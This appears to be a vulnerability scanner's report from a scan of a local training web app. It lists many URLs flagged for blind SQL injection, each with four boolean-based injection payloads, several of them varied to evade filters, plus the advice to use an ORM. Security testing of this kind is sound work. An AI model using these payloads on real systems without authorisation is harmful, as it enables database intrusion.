Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	57796=57796
	and	91747=91747
	or	98373=98373#
	and	33773=33774
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	57796=57796
	and	91747=91747
	or	98373=98373#
	and	33773=33774
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	57796=57796
	and	91747=91747
	or	98373=98373#
	and	33773=33774
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'39139'='39139
'/**/and/**/'69114'='69114
'/**/or/**/16803=16803#
'/**/and/**/'39933'='39934
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
10665=10665

and
95899=95899

or
47287=47287#

and
88131=88132
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'66004'='66004
'+and+'58590'='58590
'+or+97448=97448#
'+and+'70118'='70119
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'27251'='27251
'	and	'4080'='4080
'	or	72547=72547#
'	and	'52717'='52718
Advice: use orm
Database: unknown
---